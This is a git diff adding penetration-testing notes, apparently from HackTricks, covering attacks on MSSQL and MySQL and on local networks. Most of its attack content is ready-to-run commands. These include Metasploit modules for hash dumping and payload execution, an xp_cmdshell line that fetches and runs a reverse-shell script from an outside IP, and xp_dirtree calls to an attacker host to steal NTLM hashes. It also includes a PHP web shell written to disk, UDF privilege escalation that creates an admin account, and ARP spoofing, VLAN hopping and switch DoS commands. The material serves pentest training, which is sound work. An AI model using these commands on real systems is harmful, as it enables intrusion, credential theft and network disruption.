+### Metasploit
+
+```bash
+#Set USERNAME, RHOSTS and PASSWORD
+#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
+
+#Steal NTLM
+msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder
+
+#Info gathering
+msf> use admin/mssql/mssql_enum #Security checks
+msf> use admin/mssql/mssql_enum_domain_accounts
+msf> use admin/mssql/mssql_enum_sql_logins
+msf> use auxiliary/admin/mssql/mssql_findandsampledata
+msf> use auxiliary/scanner/mssql/mssql_hashdump
+msf> use auxiliary/scanner/mssql/mssql_schemadump
+
+#Search for insteresting data
+msf> use auxiliary/admin/mssql/mssql_findandsampledata
+msf> use auxiliary/admin/mssql/mssql_idf
+
+#Privesc
+msf> use exploit/windows/mssql/mssql_linkcrawler
+msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
+msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
+
+#Code execution
+msf> use admin/mssql/mssql_exec #Execute commands
+msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
+
+#Add new admin user from meterpreter session
+msf> use windows/manage/mssql_local_auth_bypass
+```
+
+### \*\*\*\*[**Brute force**](../brute-force.md#sql-server)\*\*\*\*
+
+## Tricks
+
+### Execute commands
+
+```bash
+#this turns on advanced options and is needed to configure xp_cmdshell
+sp_configure 'show advanced options', '1'
+RECONFIGURE
+#this enables xp_cmdshell
+sp_configure 'xp_cmdshell', '1' 
+RECONFIGURE
+# Quickly check what the service account is via xp_cmdshell
+EXEC master..xp_cmdshell 'whoami'
+```
+
+### NTLM Service Hash gathering
+
+[You can extract the](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/) [**NTLM hash**](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/) [of the user making the service authenticate against you.](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/)  
+You should start a **SMB server** to capture the hash used in the authentication \(impacket-smbserver or responder for example\).
+
+```bash
+xp_dirtree '\\<attacker_IP>\any\thing'
+exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
+msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
+```
+
+### Abusing MSSQL trusted Links
+
+\*\*\*\*[**Read this post**](../windows/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
+
+### **Read files executing scripts \(Python and R\)**
+
+MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp\_cmdshell** to execute commands.
+
+Example trying to execute a **'R'** _"Hellow World!"_ **not working**:
+
+![](../.gitbook/assets/image%20%2813%29.png)
+
+Example using configured python to perform several actions:
+
+```sql
+#Print the user being used (and execute commands)
+EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
+EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
+#Open and read a file
+EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
+#Multiline
+EXECUTE sp_execute_external_script @language = N'Python', @script = N'
+import sys
+print(sys.version)
+'
+GO
+```
+
+### From db\_owner to sysadmin
+
+[If you have the](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**credentials of a db\_owner user**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)[, you can become](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**sysadmin**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [and](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
+
+```bash
+msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
+```
+
+### Impersonation of other users
+
+[IMPERSONATE privilege can lead to privilege escalation in SQL Server.](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/)
+
+```bash
+msf> auxiliary/admin/mssql/mssql_escalate_execute_as
+```
+
+### Using MSSQL for Persistence
+
+[https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/)
+
+## Having credentials
+
+### Mssqlclient.py
+
+You can login into the service using **impacket mssqlclient.py**
+
+```bash
+mssqlclient.py  -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine
+
+#Once logged in you can run queries:
+SQL> select @@ version;
+
+#Steal NTLM hash
+sudo responder -I <interface> #Run that in other console
+SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test' #Steal the NTLM hash, crack it with john or hashcat
+
+#Try to enable code execution
+SQL> enable_xp_cmdshell
+
+#Execute code, 2 sintax, for complex and non complex cmds
+SQL> xp_cmdshell whoami /all
+SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
+```
+
+### sqsh
+
+```bash
+sqsh -S <IP> -U <Username> -P <Password> -D <Database>
+```
+
+![](../.gitbook/assets/image%20%28286%29.png)
+
+## Manual
+
+```sql
+SELECT name FROM master.dbo.sysdatabases #Get databases
+SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES; #Get table names
+#List users
+select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
+#Create user with sysadmin privs
+CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
+sp_addsrvrolemember 'hacker', 'sysadmin'
+```
+
+## Post Explotation
+
+The user running MSSQL server will have enabled the privilege token **SeImpersonatePrivilege.**  
+You probably will be able to escalate to Administrator using this token: [Juicy-potato](https://github.com/ohpe/juicy-potato)
+
diff --git a/pentesting/pentesting-mysql.md b/pentesting/pentesting-mysql.md
new file mode 100644
index 00000000..35f7f7a1
--- /dev/null
+++ b/pentesting/pentesting-mysql.md
@@ -0,0 +1,225 @@
+# 3306 - Pentesting Mysql
+
+## **Basic Information**
+
+**MySQL** is a freely available open source Relational Database Management System \(RDBMS\) that uses Structured Query Language \(**SQL**\).  
+****From [here](https://www.siteground.com/tutorials/php-mysql/mysql/).
+
+**Default port:** 3306
+
+```text
+3306/tcp open  mysql
+```
+
+## **Connect**
+
+### **Local**
+
+```bash
+mysql -u root # Connect to root without password
+mysql -u root -p # A password will be asked (check someone)
+```
+
+### Remote
+
+```bash
+mysql -h <Hostname> -u root
+mysql -h <Hostname> -u root@localhost
+```
+
+## Enumeration
+
+Some of the enumeration actions require valid credentials
+
+```bash
+nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
+msf> use auxiliary/scanner/mysql/mysql_version
+msf> use uxiliary/scanner/mysql/mysql_authbypass_hashdump
+msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
+msf> use auxiliary/admin/mysql/mysql_enum #Creds
+msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds 
+msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
+```
+
+### \*\*\*\*[**Brute force**](../brute-force.md#mysql)
+
+## Write any binary data
+
+```bash
+CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
+CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
+```
+
+## **Basic & interesting MySQL commands**
+
+```bash
+show databases;
+use <database>;
+show tables;
+describe <table_name>;
+
+select grantee, table_schema, privilege_type FROM schema_privileges; #Exact privileges
+select user,file_priv from mysql.user where user='root'; #File privileges
+select version(); #version
+select @@version(); #version
+select user(); #User
+select database(); #database name
+
+#Try to execute code
+select do_system('id');
+\! sh
+
+#Basic MySQLi
+Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
+Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"
+
+#Read & Write
+select load_file('/var/lib/mysql-files/key.txt'); #Read file
+select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'
+
+#Try to change MySQL root password
+UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
+UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
+FLUSH PRIVILEGES;
+quit;
+```
+
+```bash
+mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
+```
+
+## MySQL arbitrary read file by client
+
+Actually, when you try to **load data local into a table** the **content of a file** the MySQL or MariaDB server asks the **client to read it** and send the content. **Then, if you can tamper a mysql client to connect to your own MyQSL server, you can read arbitrary files.**  
+Please notice that this is the behaviour using: 
+
+```bash
+load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
+```
+
+ \(Notice the "local" word\)  
+Because without the "local" you can get: 
+
+```bash
+mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
+
+ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
+```
+
+**Initial PoC:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)  
+**In this paper you can see a complete description of the attack and even how to extend it to RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)  
+**Here you can find an overview of the attack:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)\*\*\*\*
+
+## POST
+
+### Mysql User
+
+It will be very interesting if mysql is running as **root**:
+
+```bash
+cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
+```
+
+### Privilege escalation
+
+How to:
+
+* Current Level of access
+  * mysql&gt;`select user();`
+  * mysql&gt;`select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';`
+* Access passwords
+  * mysql&gt; `use mysql`
+  * mysql&gt; `select user,password from user;`
+* Create a new user and grant him privileges
+  * mysql&gt;`create user test identified by 'test';`
+  * mysql&gt; `grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;`
+* Break into a shell
+  * mysql&gt; `\! cat /etc/passwd`
+  * mysql&gt; `\! bash`
+
+### Privilege Escalation via library
+
+You can find **compiled versions** of this **libraries** in sqlmap: `locate lib_mysqludf_sys.so`  and `locate lib_mysqludf_sys.dll`Instead of `locate` you can also use `whereis` to search for this libraries inside the host.
+
+#### Linux
+
+```sql
+use mysql;
+create table npn(line blob);
+insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
+select * from npn into dumpfile '/tmp/lib_mysqludf_sys.so';
+create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
+select sys_exec('id > /tmp/out.txt');
+```
+
+#### Windows
+
+```sql
+USE mysql;
+CREATE TABLE npn(line blob);
+INSERT INTO npn values(load_files('C://temp//lib_mysqludf_sys.dll'));
+SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
+CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
+SELECT sys_exec("net user npn npn12345678 /add");
+SELECT sys_exec("net localgroup Administrators npn /add");
+```
+
+### Extracting MySQL credentials from the database
+
+```sql
+SELECT User,Host,Password FROM mysql.user;
+SELECT User,Host,authentication_string FROM mysql.user;
+```
+
+```bash
+mysql -u root --password=<PASSWORD> -e "SELECT User,Host,authentication_string FROM mysql.user;"
+```
+
+### Extracting MySQL credentials from files
+
+Inside _/etc/mysql/debian.cnf_ you can find the **plain-text password** of the user **debian-sys-maint**
+
+```bash
+cat /etc/mysql/debian.cnf
+```
+
+You can **use these credentials to login in the mysql database**.
+
+Inside the file: _/var/lib/mysql/mysql/user.MYD_ you can find **all the hashes of the MySQL users** \(the ones that you can extract from mysql.user inside the database\)_._
+
+You can extract them doing:
+
+```bash
+grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
+```
+
+### Enabling logging
+
+You can enable logging of mysql queries inside `/etc/mysql/my.cnf` uncommenting the following lines:
+
+![](../.gitbook/assets/image%20%28308%29.png)
+
+### Useful files
+
+Configuration Files
+
+* windows
+  * * config.ini
+    * my.ini
+      * windows\my.ini
+      * winnt\my.ini
+    * &lt;InstDir&gt;/mysql/data/
+  * unix
+    * my.cnf
+      * /etc/my.cnf
+      * /etc/mysql/my.cnf
+      * /var/lib/mysql/my.cnf
+      * ~/.my.cnf
+      * /etc/my.cnf
+* Command History
+  * ~/.mysql.history
+* Log Files
+  * connections.log
+  * update.log
+  * common.log
+
diff --git a/pentesting/pentesting-network/README.md b/pentesting/pentesting-network/README.md
new file mode 100644
index 00000000..9fd69a66
--- /dev/null
+++ b/pentesting/pentesting-network/README.md
@@ -0,0 +1,715 @@
+# Pentesting Network
+
+Do you want to **know** about my **latest modifications**/**additions or you have any suggestion for HackTricks or PEASS**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
+## Discovering hosts from the outside
+
+This is going to be a **brief section** about how to find **IPs responding** from the **Internet**.  
+In this situation you have some **scope of IPs** \(maybe even several **ranges**\) and you just to find **which IPs are responding**.
+
+### ICMP
+
+This is the **easiest** and **fastest** way to discover if a host is up or not.  
+You could try to send some **ICMP** packets and **expect responses**. The easiest way is just sending an **echo request** and expect from the response. You can do that using a simple `ping`or using `fping`for **ranges**.  
+You could also use **nmap** to send other types of ICMP packets \(this will avoid filters to common ICMP echo request-response\).
+
+```bash
+ping -c 1 199.66.11.4    # 1 echo request to a host
+fping -g 199.66.11.0/24  # Send echo requests to ranges
+nmap -PEPM -sP -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
+```
+
+### TCP Port Discovery
+
+It's very common to find that all kind of ICMP packets are being filtered. Then, all you can do to check if a host is up is **try to find open ports**. Each host has **65535 ports**, so, if you have a "big" scope you **cannot** test if **each port** of each host is open or not, that will take too much time.  
+Then, what you need is a **fast port scanner** \([masscan](https://github.com/robertdavidgraham/masscan)\) and a list of the **ports more used:**
+
+```bash
+#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
+masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24
+```
+
+You could also perform this step with `nmap`, but it slower and somewhat `nmap`has problems identifying hosts up.
+
+### HTTP Port Discovery
+
+This is just a TCP port discovery useful when you want to **focus on discovering HTTP** **services**:
+
+```bash
+masscan -p80,443,8000-8100,8443 199.66.11.0/24
+```
+
+### UDP Port Discovery
+
+You could also try to check for some **UDP port open** to decide if you should **pay more attention** to a **host.** As UDP services usually **don't respond** with **any data** to a regular empty UDP probe packet it is difficult to say if a port is being filtered or open. The easiest way to decide this is to send a packet related to the running service, and as you don't know which service is running, you should try the most probable based on the port number:
+
+```bash
+nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
+# The -sV will make nmap test each possible known UDP service packet
+# The "--version-intensity 0" will make nmap only test the most probable
+```
+
+The nmap line proposed before will test the **top 100 UDP ports** in every host inside the **/24** range but even only this will take **&gt;20min**. If need **fastest results** you can use [**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner): `./udp-proto-scanner.pl 199.66.11.53/24` This will send these **UDP probes** to their **expected port** \(for a /24 range this will just take 1 min\): _DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp._
+
+### SCTP Port Discovery
+
+```bash
+#Probably useless, but it's pretty fast, why not trying?
+nmap -T4 -sY -n --open -Pn <IP/range>
+```
+
+## [Attacking the Wifi](wifi-attacks/)
+
+[Here you can find a nice guide of all the well known Wifi attacks at the time of the writing.](wifi-attacks/)
+
+## Discovering hosts from the inside
+
+If you are inside the network one of the first things you will want to do is to **discover other hosts**. Depending on **how much noise** you can/want to do, different actions could be performed:
+
+### Passive
+
+You can use these tools to passively discover hosts inside a connected network:
+
+```bash
+netdiscover -p
+p0f -i eth0 -p -o /tmp/p0f.log
+# Bettercap2
+net.recon on/off
+net.show
+set net.show.meta true #more info
+```
+
+### Active
+
+Note that the techniques commented in [_**Discovering hosts from the outside**_](./#discovering-hosts-from-the-outside) \(_TCP/HTTP/UDP/SCTP Port Discovery_\) can be also **applied here**.  
+But, as you are in the **same network** as the other hosts, you can do **more things**:
+
+```bash
+#ARP discovery
+nmap -sn <Network> #ARP Requests (Discover IPs)
+netdiscover -r <Network> #ARP requests (Discover IPs)
+
+#NBT discovery
+nbtscan -r 192.168.0.1/24 #Search in Domain
+
+# Bettercap2 (By default ARP requests are sent) 
+net.probe on/off #Activate all service discover and ARP
+net.probe.mdns #Search local mDNS services (Discover local)
+net.probe.nbns #Ask for NetBios name (Discover local)
+net.probe.upnp # Search services (Discover local)
+net.probe.wsd # Search Web Services Discovery (Discover local)
+net.probe.throttle 10 #10ms between requests sent (Discover local)
+
+#IPv6
+alive6 <IFACE> # Send a pingv6 to multicast.
+```
+
+### Active ICMP
+
+Note that the techniques commented in _Discovering hosts from the outside_ \([_**ICMP**_](./#icmp)\) can be also **applied here**.  
+But, as you are in the **same network** as the other hosts, you can do **more things**:
+
+* If you **ping** a **subnet broadcast address** the ping should be arrive to **each host** and they could **respond** to **you**: `ping -b 10.10.5.255` 
+* Pinging the **network broadcast address** you could even find hosts inside **other subnets**: `ping -b 255.255.255.255`
+* Use the `-PEPM` flag of `nmap`to perform host discovery sending **ICMPv4 echo**, **timestamp**, and **subnet mask requests:** `nmap -PEPM -sP –vvv -n 10.12.5.0/24`
+
+### **Wake On Land**
+
+Wake On Lad is used to **turn on** computers through a **network message**. The magic packet used to turn on the computer is only a packet where a **MAC Dst** is provided and then it is **repeated 16 times** inside the same paket.   
+Then this kind of packets are usually sent in an **ethernet 0x0842** or in a **UDP packet to port 9**.  
+If **no \[MAC\]** is provided, the packet is sent to **broadcast ethernet** \(and the broadcast MAC will be the one being repeated\). 
+
+```bash
+#WOL (without MAC is used ff:...:ff)
+wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
+wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9
+## Bettercap2 can also be used for this purpose
+```
+
+## Scanning Hosts
+
+Once you have discovered all the IPs \(external or internal\) you want to scan in depth, different actions can be performed.
+
+### TCP
+
+* **Open** port: _SYN --&gt; SYN/ACK --&gt; RST_
+* **Closed** port: _SYN --&gt; RST/ACK_
+* **Filtered** port: _SYN --&gt; \[NO RESPONSE\]_
+* **Filtered** port: _SYN --&gt; ICMP message_
+
+```bash
+## Nmap fast scan for the most 1000tcp ports used
+nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP> 
+## Nmap fast scan for all the ports
+nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP> 
+## Nmap fast scan for all the ports slower to avoid failures due to -T4
+nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>
+
+#Bettercap2 Scan
+syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000
+```
+
+### UDP
+
+There are 2 options to scan an UDP port:
+
+* Send a **UDP packet** and check for the response _**ICMP unreachable**_ if the port is **closed** \(in several cases ICMP will be **filtered** so you won't receive any information inf the port is close or open\).
+* Send a **formatted datagrams** to elicit a response from a **service** \(e.g., DNS, DHCP, TFTP, and others, as listed in _nmap-payloads_\). If you receive a **response**, then, the port is **open**.
+
+**Nmap** will **mix both** options using "-sV" \(UDP scans are very slow\), but notice that UDP scans are slower than TCP scans:
+
+```bash
+## Check if any of the most common udp services is running
+udp-proto-scanner.pl <IP> 
+## Nmap fast check if any of the 100 most common UDP services is running
+nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
+## Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
+nmap -sU -sV -sC -n -F -T4 <IP> 
+## Nmap "fast" top 1000 UDP ports
+nmap -sU -sV --version-intensity 0 -n -T4 <IP>
+## You could use nmap to test all the UDP ports, but that will take a lot of time
+```
+
+### SCTP Scan
+
+SCTP sits alongside TCP and UDP. Intended to provide **transport** of **telephony** data over **IP**, the protocol duplicates many of the reliability features of Signaling System 7 \(SS7\), and underpins a larger protocol family known as SIGTRAN. SCTP is supported by operating systems including IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, and VxWorks.
+
+Two different scans for SCTP are offered by nmap: _-sY_ and _-sZ_
+
+```bash
+## Nmap fast SCTP scan
+nmap -T4 -sY -n -oA SCTFastScan <IP>
+## Nmap all SCTP scan
+nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>
+```
+
+### [Info about IDS and IPS evasion](ids-evasion.md)
+
+### \*\*\*\*[**More nmap options**](nmap-summary-esp.md)\*\*\*\*
+
+### Revealing Internal IP Addresses
+
+Misconfigured routers, firewalls, and network devices sometimes **respond** to network probes **using nonpublic source addresses**. You can use _tcpdump_ used to **identify packets** received from **private addresses** during testing. In this case, the _eth2_ interface in Kali Linux is **addressable** from the **public Internet** \(If you are **behind** a **NAT** of a **Firewall** this kind of packets are probably going to be **filtered**\).
+
+```bash
+tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
+tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
+listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
+IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
+IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64
+```
+
+## Sniffing
+
+Sniffing you can learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or switching fabric under stress, attackers can capture sensitive material via passive network sniffing.
+
+If a switched Ethernet network is configured properly, you will only see broadcast frames and material destined for your MAC address.
+
+### TCPDump
+
+```bash
+sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
+tcpdump -i <IFACE> icmp #Listen to icmp packets
+```
+
+### Bettercap2
+
+```bash
+net.sniff on
+net.sniff stats
+net.sniff.output #Output file
+net.sniff.local #Accept packets from this machine
+net.sniff.filter
+net.sniff.regexp
+```
+
+### Wireshark
+
+Obviously.
+
+### Capturing credentials
+
+You can us tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface.
+
+## LAN attacks
+
+### ARP spoofing
+
+ARP Spoofing consist on sending gratuitous ARPResponses to indicate that the IP of a machine has the MAC of our device. Then, the victim will change the ARP table and will contact our machine every time it wants to contact the IP spoofed.
+
+#### **Bettercap2**
+
+```bash
+arp.spoof on
+arp.ban on # No ipv4-redirect
+arp.spoof.targets
+arp.spoof.whitelist
+arp.spoof.internal #Spoofed local connections (by default only Victim <--> Gateway
+```
+
+#### **Arpspoof**
+
+```bash
+echo 1 > /proc/sys/net/ipv4/ip_forward
+arpspoof -t 192.168.1.1 192.168.1.2
+arpspoof -t 192.168.1.2 192.168.1.1
+```
+
+### MAC Flooding - CAM overflow
+
+Overflow the switch’s CAM table sending a lot of packets with different source mac address. When the CAM table is full the switch start behaving like a hub \(broadcasting all the traffic\).
+
+```bash
+macof -i <interface>
+```
+
+In modern switches this vulnerability has been fixed.
+
+### 802.1Q VLAN
+
+#### Dynamic Trunking
+
+Many switches support the Dynamic Trunking Protocol \(DTP\) by default, however, which an adversary can abuse to **emulate a switch and receive traffic across all VLANs**. The tool [_dtpscan.sh_](https://github.com/commonexploits/dtpscan) can sniff an interface and **reports if switch is in Default mode, trunk, dynamic, auto or access mode** \(this is the only one that would avoid VLAN hopping\). The tool will indicate if the switch is vulnerable or not.
+
+If it was discovered that the the network is vulnerable, you can use _**Yersinia**_ to launch an "**enable trunking**" using protocol "**DTP**" and you will be able to see network packets from all the VLANs. 
+
+```bash
+apt-get install yersinia #Installation
+yersinia -I #Interactive mode
+#In interactive mode you will need to select a interface first
+#Then, you can select the protocol to attack using letter "g"
+#Finally, you can select the attack using letter "x"
+```
+
+#### Attacking specific VLANs
+
+Once you known VLAN IDs and IPs values,you can **configure a virtual interface to attack a specific VLAN**.  
+If DHCP is not available, then use _ifconfig_ to set a static IP address.
+
+```text
+root@kali:~# modprobe 8021q
+root@kali:~# vconfig add eth1 250
+Added VLAN with VID == 250 to IF -:eth1:-
+root@kali:~# dhclient eth1.250
+Reloading /etc/samba/smb.conf: smbd only.
+root@kali:~# ifconfig eth1.250
+eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
+          inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
+          inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:19 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)
+
+root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
+```
+
+#### Automatic VLAN Hopper
+
+The discussed attack of **Dynamic Trunking and creating virtual interfaces an discovering hosts inside** other VLANs are **automatically performed** by the tool: [https://github.com/nccgroup/vlan-hopping---frogger](https://github.com/nccgroup/vlan-hopping---frogger)
+
+#### Double Tagging
+
+If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**, he could try to **double tag a frame** with its designated VLAN and the VLAN of the victim and send a packet. As the **victim won't be able to connect back** with the attacker, so the **best option for the attacker is communicate via UDP** to protocols than can perform some interesting actions \(like SNMP\).
+
+Another option for the attacker is to launch a **TCP port scan spoofing an IP controlled by the attacker and accessible by the victim** \(probably through internet\). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.
+
+#### Layer 3 Private VLAN Bypass
+
+In guest wireless networks and other environments, private VLAN \(also known as _port isolation_\) settings are used to **prevent peers from interacting** \(i.e., clients **connect to a wireless access point but cannot address one another**\). Depending on network ACLs \(or lack thereof\), it might be possible to send IP packets up to a router, which are then forwarded back to a neighbouring peer.
+
+This attack will send a **specially crafted packet to the IP of a client but with the MAC of the router**. Then, the **router will redirect the packet to the client**. As in _Double Tagging Attacks_ you can exploit this vulnerability by controlling a host accessible by the victim.
+
+### STP Attacks
+
+**If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.**
+
+#### **STP BPDU DoS**
+
+Sending a lot of BPDUs TCP \(Topology Change Notification\) or Conf \(the BPDUs that are sent when the topology is created\) the switches are overloaded and stop working correctly.
+
+```bash
+yersina stp -attack 2
+yersina stp -attack 3
+#Use -M to disable MAC spoofing
+```
+
+#### **STP TCP Attack**
+
+When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you are sending continuously this kind of packets, the CAM table will be restarted continuously \(or every 15segs\) and when it is restarted, the switch behaves as a hub
+
+```bash
+yersina stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
+yersina stp -attack 0 #Will send 1 CONF packet, nothing else will happen
+```
+
+#### **STP Root Attack**
+
+The attacker simulates the behaviour of a switch to become the STP root of the network. Then, more data will pass through him. This is interesting when you are connected to two different switches.  
+This is done by sending BPDUs CONF packets saying that the **priority** value is less than the actual priority of the actual root switch.
+
+```bash
+yersina stp -attack 4 #Behaves like the root switch
+yersina stp -attack 5 #This will make the device behaves as a switch but will not be root
+```
+
+**If the attacker is connected to 2 switches he can be the root of the new tree and all the traffic between those switches will pass through him** \(a MITM attack will be performed\).
+
+```bash
+yersina stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
+ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages
+```
+
+### CDP Attacks
+
+CISCO Discovery Protocol is the protocol used by CISCO devices to talk among them, discover who is alive and what features does they have. You can make a DoS attack to a CISCO switch by exhausting the device memory simulating real CISCO devices.
+
+You could use `Yersina` to capture CDP frames and show the information
+
+```bash
+sudo yersinia cdp -attack 1 #DoS Attack simulating new CISCO devices
+sudo yersinia cdp -attack 2 #Simulate a new CISCO device
+sudo yersinia cdp -attack 0 #Send a CDP packet
+```
+
+You could also use [scapy](https://github.com/secdev/scapy/). Be sure to install it with `scapy/contrib` package.
+
+### DHCP
+
+#### Enumeration
+
+```bash
+nmap --script broadcast-dhcp-discover
+Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
+WARNING: No targets were specified, so 0 hosts scanned.
+Pre-scan script results:
+| broadcast-dhcp-discover: 
+|   Response 1 of 1: 
+|     IP Offered: 192.168.1.250
+|     DHCP Message Type: DHCPOFFER
+|     Server Identifier: 192.168.1.1
+|     IP Address Lease Time: 1m00s
+|     Subnet Mask: 255.255.255.0
+|     Router: 192.168.1.1
+|     Domain Name Server: 192.168.1.1
+|_    Domain Name: mynet
+Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds
+
+```
+
+**DoS**
+
+**Two types of DoS** could be performed against DHCP servers. The first one consists on **simulate enough fake hosts to use all the possible IP addresses**.  
